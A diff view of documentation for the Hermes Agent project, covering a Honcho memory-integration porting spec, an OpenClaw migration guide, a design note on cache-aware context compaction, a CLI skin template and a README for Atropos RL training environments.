<li class="todo"><strong>seedAiIdentity()</strong> — add helper; apply during setup migration for SOUL.md / IDENTITY.md instead of <code>session.uploadFile()</code>. (<a href="#spec-identity">spec</a>)</li>
<li class="todo"><strong>Session naming strategies</strong> — add <code>sessionStrategy</code>, <code>sessions</code> map, <code>sessionPeerPrefix</code> to config; implement resolution function. (<a href="#spec-sessions">spec</a>)</li>
<li class="todo"><strong>CLI surface injection</strong> — append command reference to <code>before_prompt_build</code> return value when Honcho is active. (<a href="#spec-cli">spec</a>)</li>
<li class="todo"><strong>honcho identity subcommand</strong> — add <code>openclaw honcho identity</code> CLI command. (<a href="#spec-identity">spec</a>)</li>
<li class="todo"><strong>AI peer name injection</strong> — if <code>aiPeer</code> name configured, prepend to injected system prompt. (<a href="#spec-identity">spec</a>)</li>
<li class="todo"><strong>honcho mode / honcho sessions / honcho map</strong> — CLI parity with Hermes. (<a href="#spec-sessions">spec</a>)</li>
</ul>
<div class="callout success">
<strong>Already done in openclaw-honcho (do not re-implement):</strong> lastSavedIndex dedup, platform metadata stripping, multi-agent parent observer hierarchy, peerPerspective on context(), tiered tool surface (fast/LLM), workspace agentPeerMap, QMD passthrough, self-hosted Honcho support.
</div>
</section>
<!-- NANOBOT CHECKLIST -->
<section id="nanobot-checklist">
<h2>nanobot-honcho checklist</h2>
<p>nanobot-honcho is a greenfield integration. Start from openclaw-honcho's architecture (hook-based, dual peer) and apply all Hermes patterns from day one rather than retrofitting. Priority order:</p>
<h3>Phase 1 — core correctness</h3>
<ul class="checklist">
<li class="todo">Dual peer model (owner + agent peer), both with <code>observe_me=True</code></li>
<li class="todo">Message capture at turn end with <code>lastSavedIndex</code> dedup</li>
<li class="todo">Platform metadata stripping before Honcho storage</li>
<li class="todo">Async prefetch from day one — do not implement blocking context injection</li>
<li class="todo">Legacy file migration at first activation (USER.md → owner peer, SOUL.md → <code>seedAiIdentity()</code>)</li>
</ul>
<h3>Phase 2 — configuration</h3>
<ul class="checklist">
<li class="todo">Config schema: <code>apiKey</code>, <code>workspaceId</code>, <code>baseUrl</code>, <code>memoryMode</code>, <code>userMemoryMode</code>, <code>agentMemoryMode</code>, <code>dialecticReasoningLevel</code>, <code>sessionStrategy</code>, <code>sessions</code></li>
<li class="todo">Per-peer memory mode gating</li>
<li class="todo">Dynamic reasoning level</li>
<li class="todo">Session naming strategies</li>
</ul>
<h3>Phase 3 — tools and CLI</h3>
<ul class="checklist">
<li class="todo">Tool surface: <code>honcho_profile</code>, <code>honcho_recall</code>, <code>honcho_analyze</code>, <code>honcho_search</code>, <code>honcho_context</code></li>
<li class="todo">CLI: <code>setup</code>, <code>status</code>, <code>sessions</code>, <code>map</code>, <code>mode</code>, <code>identity</code></li>
<li class="todo">CLI surface injection into system prompt</li>
<li class="todo">AI peer name wired into agent identity</li>
</ul>
</section>
</div>
<script type="module">
import mermaid from 'https://cdn.jsdelivr.net/npm/mermaid@11/dist/mermaid.esm.min.mjs';
mermaid.initialize({ startOnLoad: true, securityLevel: 'loose', fontFamily: 'Departure Mono, Noto Emoji, monospace' });
</script>
<script>
window.addEventListener('scroll', () => {
const bar = document.getElementById('progress');
const max = document.documentElement.scrollHeight - window.innerHeight;
bar.style.width = (max > 0 ? (window.scrollY / max) * 100 : 0) + '%';
});
</script>
</body>
</html>

View File

@@ -0,0 +1,377 @@
# honcho-integration-spec
Comparison of Hermes Agent vs. openclaw-honcho — and a porting spec for bringing Hermes patterns into other Honcho integrations.
---
## Overview
Two independent Honcho integrations have been built for two different agent runtimes: **Hermes Agent** (Python, baked into the runner) and **openclaw-honcho** (TypeScript plugin via hook/tool API). Both use the same Honcho peer paradigm — dual peer model, `session.context()`, `peer.chat()` — but they made different tradeoffs at every layer.
This document maps those tradeoffs and defines a porting spec: a set of Hermes-originated patterns, each stated as an integration-agnostic interface, that any Honcho integration can adopt regardless of runtime or language.
> **Scope** Both integrations work correctly today. This spec is about the delta — patterns in Hermes that are worth propagating and patterns in openclaw-honcho that Hermes should eventually adopt. The spec is additive, not prescriptive.
---
## Architecture comparison
### Hermes: baked-in runner
Honcho is initialised directly inside `AIAgent.__init__`. There is no plugin boundary. Session management, context injection, async prefetch, and CLI surface are all first-class concerns of the runner. Context is injected once per session (baked into `_cached_system_prompt`) and never re-fetched mid-session — this maximises prefix cache hits at the LLM provider.
Turn flow:
```
user message
→ _honcho_prefetch() (reads cache — no HTTP)
→ _build_system_prompt() (first turn only, cached)
→ LLM call
→ response
→ _honcho_fire_prefetch() (daemon threads, turn end)
→ prefetch_context() thread ──┐
→ prefetch_dialectic() thread ─┴→ _context_cache / _dialectic_cache
```
### openclaw-honcho: hook-based plugin
The plugin registers hooks against OpenClaw's event bus. Context is fetched synchronously inside `before_prompt_build` on every turn. Message capture happens in `agent_end`. The multi-agent hierarchy is tracked via `subagent_spawned`. This model is correct but every turn pays a blocking Honcho round-trip before the LLM call can begin.
Turn flow:
```
user message
→ before_prompt_build (BLOCKING HTTP — every turn)
→ session.context()
→ system prompt assembled
→ LLM call
→ response
→ agent_end hook
→ session.addMessages()
→ session.setMetadata()
```
---
## Diff table
| Dimension | Hermes Agent | openclaw-honcho |
|---|---|---|
| **Context injection timing** | Once per session (cached). Zero HTTP on response path after turn 1. | Every turn, blocking. Fresh context per turn but adds latency. |
| **Prefetch strategy** | Daemon threads fire at turn end; consumed next turn from cache. | None. Blocking call at prompt-build time. |
| **Dialectic (peer.chat)** | Prefetched async; result injected into system prompt next turn. | On-demand via `honcho_recall` / `honcho_analyze` tools. |
| **Reasoning level** | Dynamic: scales with message length. Floor = config default. Cap = "high". | Fixed per tool: recall=minimal, analyze=medium. |
| **Memory modes** | `user_memory_mode` / `agent_memory_mode`: hybrid / honcho / local. | None. Always writes to Honcho. |
| **Write frequency** | async (background queue), turn, session, N turns. | After every agent_end (no control). |
| **AI peer identity** | `observe_me=True`, `seed_ai_identity()`, `get_ai_representation()`, SOUL.md → AI peer. | Agent files uploaded to agent peer at setup. No ongoing self-observation. |
| **Context scope** | User peer + AI peer representation, both injected. | User peer (owner) representation + conversation summary. `peerPerspective` on context call. |
| **Session naming** | per-directory / global / manual map / title-based. | Derived from platform session key. |
| **Multi-agent** | Single-agent only. | Parent observer hierarchy via `subagent_spawned`. |
| **Tool surface** | Single `query_user_context` tool (on-demand dialectic). | 6 tools: session, profile, search, context (fast) + recall, analyze (LLM). |
| **Platform metadata** | Not stripped. | Explicitly stripped before Honcho storage. |
| **Message dedup** | None. | `lastSavedIndex` in session metadata prevents re-sending. |
| **CLI surface in prompt** | Management commands injected into system prompt. Agent knows its own CLI. | Not injected. |
| **AI peer name in identity** | Replaces "Hermes Agent" in DEFAULT_AGENT_IDENTITY when configured. | Not implemented. |
| **QMD / local file search** | Not implemented. | Passthrough tools when QMD backend configured. |
| **Workspace metadata** | Not implemented. | `agentPeerMap` in workspace metadata tracks agent→peer ID. |
---
## Patterns
Six patterns from Hermes are worth adopting in any Honcho integration. Each is described as an integration-agnostic interface.
**Hermes contributes:**
- Async prefetch (zero-latency)
- Dynamic reasoning level
- Per-peer memory modes
- AI peer identity formation
- Session naming strategies
- CLI surface injection
**openclaw-honcho contributes back (Hermes should adopt):**
- `lastSavedIndex` dedup
- Platform metadata stripping
- Multi-agent observer hierarchy
- `peerPerspective` on `context()`
- Tiered tool surface (fast/LLM)
- Workspace `agentPeerMap`
---
## Spec: async prefetch
### Problem
Calling `session.context()` and `peer.chat()` synchronously before each LLM call adds 200800ms of Honcho round-trip latency to every turn.
### Pattern
Fire both calls as non-blocking background work at the **end** of each turn. Store results in a per-session cache keyed by session ID. At the **start** of the next turn, pop from cache — the HTTP is already done. First turn is cold (empty cache); all subsequent turns are zero-latency on the response path.
### Interface contract
```typescript
interface AsyncPrefetch {
// Fire context + dialectic fetches at turn end. Non-blocking.
firePrefetch(sessionId: string, userMessage: string): void;
// Pop cached results at turn start. Returns empty if cache is cold.
popContextResult(sessionId: string): ContextResult | null;
popDialecticResult(sessionId: string): string | null;
}
type ContextResult = {
representation: string;
card: string[];
aiRepresentation?: string; // AI peer context if enabled
summary?: string; // conversation summary if fetched
};
```
### Implementation notes
- **Python:** `threading.Thread(daemon=True)`. Write to `dict[session_id, result]` — GIL makes this safe for simple writes.
- **TypeScript:** `Promise` stored in `Map<string, Promise<ContextResult>>`. Await at pop time. If not resolved yet, return null — do not block.
- The pop is destructive: clears the cache entry after reading so stale data never accumulates.
- Prefetch should also fire on first turn (even though it won't be consumed until turn 2).
### openclaw-honcho adoption
Move `session.context()` from `before_prompt_build` to a post-`agent_end` background task. Store result in `state.contextCache`. In `before_prompt_build`, read from cache instead of calling Honcho. If cache is empty (turn 1), inject nothing — the prompt is still valid without Honcho context on the first turn.
---
## Spec: dynamic reasoning level
### Problem
Honcho's dialectic endpoint supports reasoning levels from `minimal` to `max`. A fixed level per tool wastes budget on simple queries and under-serves complex ones.
### Pattern
Select the reasoning level dynamically based on the user's message. Use the configured default as a floor. Bump by message length. Cap auto-selection at `high` — never select `max` automatically.
### Logic
```
< 120 chars → default (typically "low")
120400 chars → one level above default (cap at "high")
> 400 chars → two levels above default (cap at "high")
```
### Config key
Add `dialecticReasoningLevel` (string, default `"low"`). This sets the floor. The dynamic bump always applies on top.
### openclaw-honcho adoption
Apply in `honcho_recall` and `honcho_analyze`: replace fixed `reasoningLevel` with the dynamic selector. `honcho_recall` uses floor `"minimal"`, `honcho_analyze` uses floor `"medium"` — both still bump with message length.
---
## Spec: per-peer memory modes
### Problem
Users want independent control over whether user context and agent context are written locally, to Honcho, or both.
### Modes
| Mode | Effect |
|---|---|
| `hybrid` | Write to both local files and Honcho (default) |
| `honcho` | Honcho only — disable corresponding local file writes |
| `local` | Local files only — skip Honcho sync for this peer |
### Config schema
```json
{
"memoryMode": "hybrid",
"userMemoryMode": "honcho",
"agentMemoryMode": "hybrid"
}
```
Resolution order: per-peer field wins → shorthand `memoryMode` → default `"hybrid"`.
### Effect on Honcho sync
- `userMemoryMode=local`: skip adding user peer messages to Honcho
- `agentMemoryMode=local`: skip adding assistant peer messages to Honcho
- Both local: skip `session.addMessages()` entirely
- `userMemoryMode=honcho`: disable local USER.md writes
- `agentMemoryMode=honcho`: disable local MEMORY.md / SOUL.md writes
---
## Spec: AI peer identity formation
### Problem
Honcho builds the user's representation organically by observing what the user says. The same mechanism exists for the AI peer — but only if `observe_me=True` is set for the agent peer. Without it, the agent peer accumulates nothing.
Additionally, existing persona files (SOUL.md, IDENTITY.md) should seed the AI peer's Honcho representation at first activation.
### Part A: observe_me=True for agent peer
```typescript
await session.addPeers([
[ownerPeer.id, { observeMe: true, observeOthers: false }],
[agentPeer.id, { observeMe: true, observeOthers: true }], // was false
]);
```
One-line change. Foundational. Without it, the AI peer representation stays empty regardless of what the agent says.
### Part B: seedAiIdentity()
```typescript
async function seedAiIdentity(
agentPeer: Peer,
content: string,
source: string
): Promise<boolean> {
const wrapped = [
`<ai_identity_seed>`,
`<source>${source}</source>`,
``,
content.trim(),
`</ai_identity_seed>`,
].join("\n");
await agentPeer.addMessage("assistant", wrapped);
return true;
}
```
### Part C: migrate agent files at setup
During `honcho setup`, upload agent-self files (SOUL.md, IDENTITY.md, AGENTS.md) to the agent peer via `seedAiIdentity()` instead of `session.uploadFile()`. This routes content through Honcho's observation pipeline.
### Part D: AI peer name in identity
When the agent has a configured name, prepend it to the injected system prompt:
```typescript
const namePrefix = agentName ? `You are ${agentName}.\n\n` : "";
return { systemPrompt: namePrefix + "## User Memory Context\n\n" + sections };
```
### CLI surface
```
honcho identity <file> # seed from file
honcho identity --show # show current AI peer representation
```
---
## Spec: session naming strategies
### Problem
A single global session means every project shares the same Honcho context. Per-directory sessions provide isolation without requiring users to name sessions manually.
### Strategies
| Strategy | Session key | When to use |
|---|---|---|
| `per-directory` | basename of CWD | Default. Each project gets its own session. |
| `global` | fixed string `"global"` | Single cross-project session. |
| manual map | user-configured per path | `sessions` config map overrides directory basename. |
| title-based | sanitized session title | When agent supports named sessions set mid-conversation. |
### Config schema
```json
{
"sessionStrategy": "per-directory",
"sessionPeerPrefix": false,
"sessions": {
"/home/user/projects/foo": "foo-project"
}
}
```
### CLI surface
```
honcho sessions # list all mappings
honcho map <name> # map cwd to session name
honcho map # no-arg = list mappings
```
Resolution order: manual map → session title → directory basename → platform key.
---
## Spec: CLI surface injection
### Problem
When a user asks "how do I change my memory settings?" the agent either hallucinates or says it doesn't know. The agent should know its own management interface.
### Pattern
When Honcho is active, append a compact command reference to the system prompt. Keep it under 300 chars.
```
# Honcho memory integration
Active. Session: {sessionKey}. Mode: {mode}.
Management commands:
honcho status — show config + connection
honcho mode [hybrid|honcho|local] — show or set memory mode
honcho sessions — list session mappings
honcho map <name> — map directory to session
honcho identity [file] [--show] — seed or show AI identity
honcho setup — full interactive wizard
```
---
## openclaw-honcho checklist
Ordered by impact:
- [ ] **Async prefetch** — move `session.context()` out of `before_prompt_build` into post-`agent_end` background Promise
- [ ] **observe_me=True for agent peer** — one-line change in `session.addPeers()`
- [ ] **Dynamic reasoning level** — add helper; apply in `honcho_recall` and `honcho_analyze`; add `dialecticReasoningLevel` to config
- [ ] **Per-peer memory modes** — add `userMemoryMode` / `agentMemoryMode` to config; gate Honcho sync and local writes
- [ ] **seedAiIdentity()** — add helper; use during setup migration for SOUL.md / IDENTITY.md
- [ ] **Session naming strategies** — add `sessionStrategy`, `sessions` map, `sessionPeerPrefix`
- [ ] **CLI surface injection** — append command reference to `before_prompt_build` return value
- [ ] **honcho identity subcommand** — seed from file or `--show` current representation
- [ ] **AI peer name injection** — if `aiPeer` name configured, prepend to injected system prompt
- [ ] **honcho mode / sessions / map** — CLI parity with Hermes
Already done in openclaw-honcho (do not re-implement): `lastSavedIndex` dedup, platform metadata stripping, multi-agent parent observer, `peerPerspective` on `context()`, tiered tool surface, workspace `agentPeerMap`, QMD passthrough, self-hosted Honcho.
---
## nanobot-honcho checklist
Greenfield integration. Start from openclaw-honcho's architecture and apply all Hermes patterns from day one.
### Phase 1 — core correctness
- [ ] Dual peer model (owner + agent peer), both with `observe_me=True`
- [ ] Message capture at turn end with `lastSavedIndex` dedup
- [ ] Platform metadata stripping before Honcho storage
- [ ] Async prefetch from day one — do not implement blocking context injection
- [ ] Legacy file migration at first activation (USER.md → owner peer, SOUL.md → `seedAiIdentity()`)
### Phase 2 — configuration
- [ ] Config schema: `apiKey`, `workspaceId`, `baseUrl`, `memoryMode`, `userMemoryMode`, `agentMemoryMode`, `dialecticReasoningLevel`, `sessionStrategy`, `sessions`
- [ ] Per-peer memory mode gating
- [ ] Dynamic reasoning level
- [ ] Session naming strategies
### Phase 3 — tools and CLI
- [ ] Tool surface: `honcho_profile`, `honcho_recall`, `honcho_analyze`, `honcho_search`, `honcho_context`
- [ ] CLI: `setup`, `status`, `sessions`, `map`, `mode`, `identity`
- [ ] CLI surface injection into system prompt
- [ ] AI peer name wired into agent identity

110
docs/migration/openclaw.md Normal file
View File

@@ -0,0 +1,110 @@
# Migrating from OpenClaw to Hermes Agent
This guide covers how to import your OpenClaw settings, memories, skills, and API keys into Hermes Agent.
## Three Ways to Migrate
### 1. Automatic (during first-time setup)
When you run `hermes setup` for the first time and Hermes detects `~/.openclaw`, it automatically offers to import your OpenClaw data before configuration begins. Just accept the prompt and everything is handled for you.
### 2. CLI Command (quick, scriptable)
```bash
hermes claw migrate # Full migration with confirmation prompt
hermes claw migrate --dry-run # Preview what would happen
hermes claw migrate --preset user-data # Migrate without API keys/secrets
hermes claw migrate --yes # Skip confirmation prompt
```
**All options:**
| Flag | Description |
|------|-------------|
| `--source PATH` | Path to OpenClaw directory (default: `~/.openclaw`) |
| `--dry-run` | Preview only — no files are modified |
| `--preset {user-data,full}` | Migration preset (default: `full`). `user-data` excludes secrets |
| `--overwrite` | Overwrite existing files (default: skip conflicts) |
| `--migrate-secrets` | Include allowlisted secrets (auto-enabled with `full` preset) |
| `--workspace-target PATH` | Copy workspace instructions (AGENTS.md) to this absolute path |
| `--skill-conflict {skip,overwrite,rename}` | How to handle skill name conflicts (default: `skip`) |
| `--yes`, `-y` | Skip confirmation prompts |
### 3. Agent-Guided (interactive, with previews)
Ask the agent to run the migration for you:
```
> Migrate my OpenClaw setup to Hermes
```
The agent will use the `openclaw-migration` skill to:
1. Run a dry-run first to preview changes
2. Ask about conflict resolution (SOUL.md, skills, etc.)
3. Let you choose between `user-data` and `full` presets
4. Execute the migration with your choices
5. Print a detailed summary of what was migrated
## What Gets Migrated
### `user-data` preset
| Item | Source | Destination |
|------|--------|-------------|
| SOUL.md | `~/.openclaw/workspace/SOUL.md` | `~/.hermes/SOUL.md` |
| Memory entries | `~/.openclaw/workspace/MEMORY.md` | `~/.hermes/memories/MEMORY.md` |
| User profile | `~/.openclaw/workspace/USER.md` | `~/.hermes/memories/USER.md` |
| Skills | `~/.openclaw/workspace/skills/` | `~/.hermes/skills/openclaw-imports/` |
| Command allowlist | `~/.openclaw/workspace/exec_approval_patterns.yaml` | Merged into `~/.hermes/config.yaml` |
| Messaging settings | `~/.openclaw/config.yaml` (TELEGRAM_ALLOWED_USERS, MESSAGING_CWD) | `~/.hermes/.env` |
| TTS assets | `~/.openclaw/workspace/tts/` | `~/.hermes/tts/` |
### `full` preset (adds to `user-data`)
| Item | Source | Destination |
|------|--------|-------------|
| Telegram bot token | `~/.openclaw/config.yaml` | `~/.hermes/.env` |
| OpenRouter API key | `~/.openclaw/.env` or config | `~/.hermes/.env` |
| OpenAI API key | `~/.openclaw/.env` or config | `~/.hermes/.env` |
| Anthropic API key | `~/.openclaw/.env` or config | `~/.hermes/.env` |
| ElevenLabs API key | `~/.openclaw/.env` or config | `~/.hermes/.env` |
Only these 6 allowlisted secrets are ever imported. Other credentials are skipped and reported.
## Conflict Handling
By default, the migration **will not overwrite** existing Hermes data:
- **SOUL.md** — skipped if one already exists in `~/.hermes/`
- **Memory entries** — skipped if memories already exist (to avoid duplicates)
- **Skills** — skipped if a skill with the same name already exists
- **API keys** — skipped if the key is already set in `~/.hermes/.env`
To overwrite conflicts, use `--overwrite`. The migration creates backups before overwriting.
For skills, you can also use `--skill-conflict rename` to import conflicting skills under a new name (e.g., `skill-name-imported`).
## Migration Report
Every migration (including dry runs) produces a report showing:
- **Migrated items** — what was successfully imported
- **Conflicts** — items skipped because they already exist
- **Skipped items** — items not found in the source
- **Errors** — items that failed to import
For execute runs, the full report is saved to `~/.hermes/migration/openclaw/<timestamp>/`.
## Troubleshooting
### "OpenClaw directory not found"
The migration looks for `~/.openclaw` by default. If your OpenClaw is installed elsewhere, use `--source`:
```bash
hermes claw migrate --source /path/to/.openclaw
```
### "Migration script not found"
The migration script ships with Hermes Agent. If you installed via pip (not git clone), the `optional-skills/` directory may not be present. Install the skill from the Skills Hub:
```bash
hermes skills install openclaw-migration
```
### Memory overflow
If your OpenClaw MEMORY.md or USER.md exceeds Hermes' character limits, excess entries are exported to an overflow file in the migration report directory. You can manually review and add the most important ones.

View File

@@ -0,0 +1,192 @@
# Cache-Aware Context Compaction Design Note
> For Hermes: this note is a design/implementation sketch for revisiting prune-first compaction without optimizing token spend at the expense of prompt-cache stability.
Goal: reduce compression cost while keeping cache-break frequency as low as possible.
Architecture: keep Hermes' current invariant that conversation history is only mutated during context compression, then make prune-first compaction conservative enough that it only short-circuits when it buys meaningful runway. If pruning only gets us barely below threshold, fall through to the existing summary compaction immediately.
Tech Stack: `agent/context_compressor.py`, existing `call_llm()`-based summary path, pytest coverage in `tests/agent/test_context_compressor.py`.
---
## 1. Baseline behavior on current main
Today Hermes behaves like this:
1. Prompt crosses the compression threshold.
2. We mutate transcript history once by summarizing the middle region with an LLM.
3. We preserve role alternation and tool-call/tool-result integrity.
4. We continue the conversation from the compressed transcript.
This is expensive in two ways:
- an auxiliary summary call is often required
- the entire compressed middle region is rewritten even when the real problem was just a few huge old tool outputs
But it has one strong cache property:
- it tends to reclaim a lot of headroom per compression event, so the next compression is usually farther away
---
## 2. Why naive prune-first compaction is not enough
A naive prune-first policy says:
- prune old tool outputs
- if prompt is now below threshold, stop
This improves per-event token cost, but it can hurt cache economics:
- prune-only may reclaim less headroom than full compaction
- smaller headroom means the next compression may happen sooner
- each compression event is still a cache-breaking transcript mutation
So there is a real failure mode:
- fewer tokens per compression
- more compression events overall
- worse cache break cadence
That is exactly the tradeoff we want to avoid.
---
## 3. Cache-aware principle
Prune-first compaction should only short-circuit when it buys real runway, not when it merely dips under threshold.
Rule of thumb:
- compression frequency matters as much as compression size
- a smaller mutation is not automatically cheaper if it causes another mutation a few turns later
So the design target is:
- fewer auxiliary summary calls
- without materially increasing compression frequency
---
## 4. Conservative prototype policy
The conservative prototype keeps all existing compression invariants and only changes the acceptance rule for prune-only compaction.
### Phase 1: prune old middle tool outputs
Only prune tool outputs that are:
- in the compressible middle region
- not in protected head/tail windows
- not from protected tools (`read_file`, `memory`, `clarify`, `skill_view`, `todo`)
### Phase 2: require a low-water mark
Do not accept prune-only just because it lands below threshold.
Instead require:
- `post_prune_tokens <= prune_target_tokens`
Where:
- `prune_runway_tokens = max(prune_minimum_tokens, 15% of threshold_tokens)`
- `prune_target_tokens = threshold_tokens - prune_runway_tokens`
Interpretation:
- pruning must get us comfortably below threshold
- otherwise we immediately fall through to normal LLM summary compaction
Why this helps:
- protects cache by avoiding "micro-compactions" that would be followed by another compression shortly after
- still avoids the summary call when pruning truly buys useful runway
---
## 5. What the prototype currently does
The prototype branch currently:
- keeps prune-first compaction
- adds the low-water / runway requirement above
- preserves current main behavior for summary role alternation
- preserves the centralized `call_llm()` summary path
- keeps head/tail and tool-call/result integrity handling unchanged
This means the branch is no longer optimizing only for token reduction per event; it is explicitly biased toward fewer compression events.
---
## 6. Metrics we should evaluate before merging any future version
A serious cache-aware review should measure all of these, not just token savings:
1. Compression events per 100 conversation turns
2. Average turns between compressions
3. Auxiliary summary calls per session
4. Average tokens reclaimed per compression event
5. Total prompt+auxiliary tokens spent over a long session
6. Earliest changed message index during compression
7. Ratio of prune-only compressions to full summary compressions
The most important comparison is:
- baseline main vs conservative prune-first
Success is not:
- "fewer tokens in one compression"
Success is:
- "equal or better total session cost without increasing compression/cache-break cadence in a meaningful way"
---
## 7. Better long-term directions
If we want a stronger cache story than conservative prune-first, these are the real next-step options:
### A. Insertion-time trimming
Best cache-preserving option.
Idea:
- trim or summarize giant tool outputs before they become durable transcript history
- keep a compact representation from the start instead of mutating history later
Pros:
- avoids later cache-breaking rewrites for those blobs
- makes transcript size stable earlier
Cons:
- more invasive design change
- requires careful UX and provenance handling
### B. Provider/backend-aware compaction policy
Different providers may reward:
- preserving a longer stable prefix
- or simply reducing total prompt size
We may eventually want backend-specific heuristics for:
- prune runway targets
- compression thresholds
- when to prefer summary vs pruning
### C. Explicit compression telemetry
If compression remains a core feature, `ContextCompressor` should expose enough telemetry to understand real-world cadence:
- prune-only count
- full summary count
- average recovered tokens
- last compression mode
This is not required for the conservative prototype, but it would make future tuning much easier.
---
## 8. Recommended next steps
1. Keep the conservative prototype local for review.
2. Run targeted tests plus long-session manual trials.
3. If it looks promising, add telemetry before opening another PR.
4. If cache stability remains the top priority, pursue insertion-time trimming instead of further read-time pruning tweaks.
---
## 9. Review question for Teknium
The key product question is:
"Should Hermes optimize compression primarily for per-event token cost, or for minimizing the number of transcript mutations over the lifetime of a session?"
This prototype assumes the answer is:
- prioritize fewer transcript mutations unless pruning buys substantial runway.

View File

@@ -0,0 +1,89 @@
# ============================================================================
# Hermes Agent — Example Skin Template
# ============================================================================
#
# Copy this file to ~/.hermes/skins/<name>.yaml to create a custom skin.
# All fields are optional — missing values inherit from the default skin.
# Activate with: /skin <name> or display.skin: <name> in config.yaml
#
# See hermes_cli/skin_engine.py for the full schema reference.
# ============================================================================
# Required: unique skin name (used in /skin command and config)
name: example
description: An example custom skin — copy and modify this template
# ── Colors ──────────────────────────────────────────────────────────────────
# Hex color values for Rich markup. These control the CLI's visual palette.
colors:
# Banner panel (the startup welcome box)
banner_border: "#CD7F32" # Panel border
banner_title: "#FFD700" # Panel title text
banner_accent: "#FFBF00" # Section headers (Available Tools, Skills, etc.)
banner_dim: "#B8860B" # Dim/muted text (separators, model info)
banner_text: "#FFF8DC" # Body text (tool names, skill names)
# UI elements
ui_accent: "#FFBF00" # General accent color
ui_label: "#4dd0e1" # Labels
ui_ok: "#4caf50" # Success indicators
ui_error: "#ef5350" # Error indicators
ui_warn: "#ffa726" # Warning indicators
# Input area
prompt: "#FFF8DC" # Prompt text color
input_rule: "#CD7F32" # Horizontal rule around input
# Response box
response_border: "#FFD700" # Response box border (ANSI color)
# Session display
session_label: "#DAA520" # Session label
session_border: "#8B8682" # Session ID dim color
# ── Spinner ─────────────────────────────────────────────────────────────────
# Customize the animated spinner shown during API calls and tool execution.
spinner:
# Faces shown while waiting for the API response
waiting_faces:
- "(。◕‿◕。)"
- "(◕‿◕✿)"
- "٩(◕‿◕。)۶"
# Faces shown during extended thinking/reasoning
thinking_faces:
- "(。•́︿•̀。)"
- "(◔_◔)"
- "(¬‿¬)"
# Verbs used in spinner messages (e.g., "pondering your request...")
thinking_verbs:
- "pondering"
- "contemplating"
- "musing"
- "ruminating"
# Optional: left/right decorations around the spinner
# Each entry is a [left, right] pair. Omit entirely for no wings.
# wings:
# - ["⟪⚔", "⚔⟫"]
# - ["⟪▲", "▲⟫"]
# ── Branding ────────────────────────────────────────────────────────────────
# Text strings used throughout the CLI interface.
branding:
agent_name: "Hermes Agent" # Banner title, about display
welcome: "Welcome! Type your message or /help for commands."
goodbye: "Goodbye! ⚕" # Exit message
response_label: " ⚕ Hermes " # Response box header label
prompt_symbol: " " # Input prompt symbol
help_header: "(^_^)? Available Commands" # /help header text
# ── Tool Output ─────────────────────────────────────────────────────────────
# Character used as the prefix for tool output lines.
# Default is "┊" (thin dotted vertical line). Some alternatives:
# "╎" (light triple dash vertical)
# "▏" (left one-eighth block)
# "│" (box drawing light vertical)
# "┃" (box drawing heavy vertical)
tool_prefix: "┊"

334
environments/README.md Normal file
View File

@@ -0,0 +1,334 @@
# Hermes-Agent Atropos Environments
This directory contains the integration layer between **hermes-agent's** tool-calling capabilities and the **Atropos** RL training framework. It provides everything needed to run agentic LLMs through multi-turn tool-calling loops, score their output with arbitrary reward functions, and feed results into Atropos for training or evaluation.
## Architecture Overview
```
Atropos Framework
┌───────────────────────┐
│ BaseEnv │ (atroposlib)
│ - Server management │
│ - Worker scheduling │
│ - Wandb logging │
│ - CLI (serve/process/ │
│ evaluate) │
└───────────┬───────────┘
│ inherits
┌───────────┴───────────┐
│ HermesAgentBaseEnv │ hermes_base_env.py
│ - Terminal backend │
│ - Tool resolution │
│ - Agent loop │
│ - ToolContext │
│ - Async patches │
└───────────┬───────────┘
│ inherits
┌─────────────────┼─────────────────┐
│ │ │
TerminalTestEnv HermesSweEnv TerminalBench2EvalEnv
(stack testing) (SWE training) (TB2 benchmark eval)
```
### Inheritance Chain
**BaseEnv** (from `atroposlib`) is the Atropos base class. It provides:
- Server management (OpenAI-compatible API servers, VLLM, SGLang)
- Worker scheduling for parallel rollouts
- Wandb integration for metrics and rollout logging
- CLI interface with three subcommands: `serve`, `process`, `evaluate`
- `evaluate_log()` for saving eval results to JSON + samples.jsonl
**HermesAgentBaseEnv** (`hermes_base_env.py`) extends BaseEnv with hermes-agent specifics:
- Sets `os.environ["TERMINAL_ENV"]` to configure the terminal backend (local, docker, modal, daytona, ssh, singularity)
- Resolves hermes-agent toolsets via `_resolve_tools_for_group()` (calls `get_tool_definitions()` which queries `tools/registry.py`)
- Implements `collect_trajectory()` which runs the full agent loop and computes rewards
- Supports two-phase operation (Phase 1: OpenAI server, Phase 2: VLLM ManagedServer)
- Applies monkey patches for async-safe tool operation at import time
Concrete environments inherit from `HermesAgentBaseEnv` and implement:
- `setup()` -- Load dataset, initialize state
- `get_next_item()` -- Return the next item for rollout
- `format_prompt()` -- Convert a dataset item into the user message
- `compute_reward()` -- Score the rollout using ToolContext
- `evaluate()` -- Periodic evaluation logic
## Core Components
### Agent Loop (`agent_loop.py`)
`HermesAgentLoop` is the reusable multi-turn agent engine. It runs the same pattern as hermes-agent's `run_agent.py`:
1. Send messages + tools to the API via `server.chat_completion()`
2. If the response contains `tool_calls`, execute each one via `handle_function_call()` (which delegates to `tools/registry.py`'s `dispatch()`)
3. Append tool results to the conversation and go back to step 1
4. If the response has no tool_calls, the agent is done
Tool calls are executed in a thread pool (`run_in_executor`) so backends that use `asyncio.run()` internally (Modal, Docker) don't deadlock inside Atropos's event loop.
Returns an `AgentResult` containing the full conversation history, turn count, reasoning content per turn, tool errors, and optional ManagedServer state (for Phase 2).
### Tool Context (`tool_context.py`)
`ToolContext` is a per-rollout handle that gives reward/verification functions direct access to **all** hermes-agent tools, scoped to the rollout's `task_id`. The same `task_id` means the terminal/browser session is the SAME one the model used during its rollout -- all state (files, processes, browser tabs) is preserved.
```python
async def compute_reward(self, item, result, ctx: ToolContext):
# Run tests in the model's terminal sandbox
test = ctx.terminal("pytest -v")
if test["exit_code"] == 0:
return 1.0
# Check if a file was created
content = ctx.read_file("/workspace/solution.py")
if content.get("content"):
return 0.5
# Download files locally for verification (binary-safe)
ctx.download_file("/remote/output.bin", "/local/output.bin")
return 0.0
```
Available methods:
- **Terminal**: `terminal(command, timeout)` -- run shell commands
- **Files**: `read_file(path)`, `write_file(path, content)`, `search(query, path)`
- **Transfers**: `upload_file()`, `upload_dir()`, `download_file()`, `download_dir()` -- binary-safe file transfers between host and sandbox
- **Web**: `web_search(query)`, `web_extract(urls)`
- **Browser**: `browser_navigate(url)`, `browser_snapshot()`
- **Generic**: `call_tool(name, args)` -- call any hermes-agent tool by name
